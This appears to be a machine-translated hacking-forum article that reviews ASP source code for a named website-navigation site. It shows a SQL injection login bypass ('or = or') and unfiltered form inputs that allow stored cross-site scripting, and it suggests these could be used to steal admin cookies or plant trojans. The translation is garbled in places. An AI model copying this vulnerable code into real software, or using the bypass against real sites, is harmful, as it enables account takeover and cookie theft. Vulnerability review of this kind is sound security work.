Analysis of the source code vulnerability of the website navigation that cannot be found online

The original works of www.2cto.com are reprinted by the red black guest alliance.

This article can communicate with the author here: http://bbs.2cto.com/read.php? Tid = 94372

A friend of mine on the Internet gave me a website navigation website and asked me to help him publicize the website. I think his website is powerful and has many more practical functions than websites such as hao123, I think this program should be safe. After a friend package the program for me, I checked it and found some super-low-level vulnerabilities. Let's look at it.

Login verification vulnerability. This program has a user login location where "or = or vulnerability occurs due to poor logon. Let's look at the source code.

The logon address isHttp://nihao188.com/user/login.htmLet's take a look at his Processing Form file login. asp code.

<% Dim pw, vtime, myname // defines three variables
Myname = trim (request ("username") // The account sent from the client is accepted through the request object. The programmer is not strict in writing and does not define the method to accept it, only spaces are filtered.
Pw = md5 (trim (request ("pw"), 16) // This code is the same and only filters Spaces
Vtime = request ("vtime ")
Set rs = server. createobject ("adodb. recordset ")
Rs. open "select * from my_user where username =" & myname & "and password =" & pw & "", conn, 1, 3

// Directly query the database

The following are omitted ------------------

I will add comments to the end of this code for your convenience.

After reading the above code, you can directly use or = or to log in.

This is a vulnerability. There is a new site login on the homepage. This is the page for submitting a user's new site. There is a cross-site vulnerability on this page, we can use this vulnerability in the background to obtain information such as cookies and even Trojans !!!

Let's take a look at the code on this page.

The address isHttp://www.nihao188.com/url.html

Process the file as a url. asp file

Set rs = server. createobject ("adodb. recordset ")
Login_UrlNmae = Request. Form ("webname ")
Login_Url = Request. Form ("weburl ")
Login_Class = Request. Form ("webtype ")
Alexa = Request. Form ("alexa ")
Login_Email = Request. Form ("email ")
Qq = Request. Form ("qq ")
Friend = Request. Form ("friend ")
Login_Menu = Request. Form ("Login_Menu ")
If Login_Menu = "Add" then
Rs. open "select * from Login where Login_Url =" & Login_Url & "", conn, 1, 3
If not rs. eof and not rs. bof then
Response. Write ("<script language = javascript> alert (your site has already submitted, please do not submit it again !); This. location. href =/; </script> ")
Response. End ()
End if
Rs. close
Rs. open "select * from Login", conn, 1, 3
Rs. addnew
Rs ("Login_UrlNmae") = Login_UrlNmae
Rs ("Login_Url") = Login_Url
Rs ("Login_Class") = Login_Class
Rs ("alexa") = alexa
Rs ("Login_Email") = Login_Email
Rs ("qq") = qq
Rs ("friend") = friend

From the code above, we can see that the above data is directly inserted into the database for query without any filtering.

There is a netizen leaving a message on the home page, which has a Cross-Site vulnerability.

Address:Http://www.nihao188.com/quality.html

The code is

Message = trim (request ("requireddescription "))
If Message = "" then
Response. write "<SCRIPT language = JavaScript> alert (Please provide your comments and suggestions on nihao188 website navigation !); "
Response. write "javascript: location. replace (/) </SCRIPT>"
Else

Set rsAdd = Server. CreateObject ("ADODB. Recordset ")
SQL = "select * from Message"
RsAdd. open SQL, conn, 1, 3
RsAdd. addnew
RsAdd ("Message") = Message
RsAdd ("date") = now ()
RsAdd. update
RsAdd. close
Response. write "<SCRIPT language = JavaScript> alert (Your message has been submitted! Thank you for your support !); "
Response. write "javascript: location. replace (/) </SCRIPT>"
Response. end

Only spaces are filtered !!!

Therefore, the program security is still very problematic.

Finally, I publicized the website.

Http://www.nihao188.com/

2009 the most popular Web site home, web site navigation, web site Daquan, practical web site exhausted

For your support, Please repost this article with a clear blog link:Http://hi.baidu.com/tongming133